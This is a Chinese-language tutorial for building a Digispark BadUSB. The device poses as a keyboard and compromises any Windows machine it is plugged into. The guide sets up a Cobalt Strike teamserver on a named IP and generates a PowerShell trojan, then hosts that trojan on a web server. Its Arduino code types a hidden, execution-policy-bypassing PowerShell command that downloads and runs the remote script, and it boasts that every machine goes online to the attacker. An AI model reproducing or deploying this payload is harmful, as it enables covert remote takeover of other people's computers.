使用digispark制作一个BadUSB
0X00、工具准备
digispark开发板。
淘宝连接:https://m.tb.cn/h.VK7vwjy?sm=d85844
0X01、安装Arduino IDE环境
1、安装 arduino 的 IDE。
下载地址:https://www.arduino.cc/en/Main/Software
新版下载:https://downloads.arduino.cc/arduino-1.8.3-windows.zip
2、下载驱动
链接:http://pan.baidu.com/s/1i4K10dn 密码:ilaf
3、驱动安装
如果是 64 位操作系统请选择 DPinst64.exe,否则请选择 DPinst.exe.
4、配置环境
点击文件--首选项
附加开发板管理器网址:http://digistump.com/package_digistump_index.json
点击工具--开发板管理器
等待下载完成,下载可能需要挂国外代理。
找到这个进行安装
安装完成后开发板选择这个
0X02、使用CobaltStrike生成木马
1、启动CS
服务器:
通过screen启动cs服务端
screen
./teamserver 129.204.113.202 admin888
ctrl + a+d 将当前程序放到后台。
客户端启动
java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
客户端连接
2、生成木马
配置监听器:
使用CS生成powershell的脚本。
保存到桌面
3、放到远程服务器备用
将脚本上传到HTTP服务器备用
0X03、BadUsb制作
代码如下:
#include "DigiKeyboard.h"
#define KEY_ESC 41
#define KEY_BACKSPACE 42
#define KEY_TAB 43
#define KEY_PRT_SCR 70
#define KEY_DELETE 76
void setup() {
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://qianxiao996.cn/badusb.ps1');"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(750);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop() {
}
功能是下载打开windwos+r 运行窗口,输入命令执行。
点击上传,在60s之内插入你的badusb。
上传成功。
插哪哪上线!
0X04、参考链接
https://mp.weixin.qq.com/s/3lkdXK_g-_xcf378FNly1A
https://mp.weixin.qq.com/s/UROx1fJOmMVbmH_-UasFEQ